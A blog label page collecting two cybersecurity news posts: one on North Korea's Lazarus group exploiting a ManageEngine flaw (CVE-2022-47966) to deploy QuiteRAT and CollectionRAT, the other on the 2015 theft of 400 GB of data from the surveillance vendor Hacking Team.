Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Hacking Team. Show all posts

Lazarus Employs Public ManageEngine Exploit to Breach Internet Firms

 

The North Korean state-backed hacking group Lazarus has been compromising an internet backbone infrastructure provider and healthcare organisations by exploiting a major flaw (CVE-2022-47966) in Zoho's ManageEngine ServiceDesk. 

The attacks kicked off earlier this year with the goal of infiltrating companies in the United States and the UK in order to disseminate the QuiteRAT malware and a newly found remote access trojan (RAT) known as CollectionRAT. 

CollectionRAT was discovered after researchers analysed the infrastructure employed by the campaigns, which the threat actor had previously used for past assaults. 

Targeting internet firms 

Researchers at Cisco Talos observed attacks against UK internet enterprises in early 2023 when Lazarus exploited CVE-2022-47966, a pre-authentication remote code execution bug impacting numerous Zoho ManageEngine products.

"In early 2023, we observed Lazarus Group successfully compromise an internet backbone infrastructure provider in the United Kingdom to successfully deploy QuiteRAT. The actors exploited a vulnerable ManageEngine ServiceDesk instance to gain initial access," researchers at Cisco Talos stated. 

According to the analysts, Lazarus began employing the attack just five days after it became public. Multiple hackers used the exploit in attacks, as discovered by Rapid7, Shadowserver, and GreyNoise, forcing CISA to issue a warning to organisations. 

Lazarus hackers dropped the QuiteRAT malware from an external URL after exploiting the vulnerability to infiltrate a target.

QuiteRAT, found in February 2023, is described as a basic yet powerful remote access trojan that appears to be a step up from the more well-known MagicRAT, which Lazarus deployed in the second part of 2022 to target energy suppliers. 

The nalware's code is leaner than MagicRAT's, and careful library selection has decreased its size from 18MB to 4MB while preserving the same set of functions, researchers added.

New Lazarus malware 

In a separate report published earlier this week, Cisco Talos stated that Lazarus hackers had developed a new malware known as CollectionRAT, which is related to the "EarlyRAT" family. The new threat was discovered when experts examined the infrastructure employed by the actor in earlier operations.

CollectionRAT's features include arbitrary command execution, file management, gathering system information, reverse shell creation, new process spawning, fetching and launching new payloads, and self-deletion. 

Another intriguing feature of CollectionRAT is its use of the Microsoft Foundation Class (MFC) framework, which allows it to decrypt and execute code on the fly, elude detection, and frustrate analysis. 

Cisco Talos learned further indications of evolution in Lazarus' tactics, techniques, and procedures, such as the extensive use of open-source tools and frameworks, such as Mimikatz for credential stealing, PuTTY Link (Plink) for remote tunnelling, and DeimosC2 for command and control communication. 

This strategy makes it difficult to attribute, monitor, and create efficient defences because Lazarus leaves behind fewer identifiable traces.

An unidentified group stole 400 GB data from Hacking Team


An unidentified group of hackers stole 400 GB worth of confidential data from the Hacking Team, which provides effective, easy-to-use offensive technology to the worldwide law enforcement and intelligence communities.

According to report published on Welivesecurity, the attack started late night on July 6. It is said that the weak passwords might be reason behind the leak.

“Passwords are also contained in the leaked documents, including the login for the company’s official Twitter account which was used by the attackers to publish confidential information. The attackers posted private emails from company employees to Twitter, as well as a link from where anybody can download the 400GB file,” the report read.

The company’s official came to know about the attack only on the next morning. 

Christian Pozzi, a security engineer, on July 7 confirmed by stating that, “We are awake. The people responsible for this will be arrested. We are working with the police at the moment.” 

The researchers have claimed that as the company, which develops surveillance tools, sells such tools to various organizations across the world and that might be the reason behind the hacking.

 J. Prasanna, Founder of Cyber Security & Privacy Foundation, said the Hacking team has been accused of selling software to hack into people for last few years. They seem to have supplied to countries where there are dictatorship regime (where people are targeted by government).

“Maybe an activist group would have hacked into the servers of hacking team,” opined Prasanna.
“Companies can make such tools, but it should be sold responsibly to democratic regime, such activity of monitoring should be subject after a court warrant. It should never be sold to countries which does human rights violations,” he added.

 He added that there was always weak element in security.

“There may have a zero day vulnerabilities which hackers could have used to exploit,” he said. 

Regarding about the impact of the attack, Prasanna said that many countries or governments who dealt and bought this software would get exposed.

“Today, many governments and companies are hungry for information on people/corporations/governments. So they hire hackers or software that does hacking,” Prasanna concluded.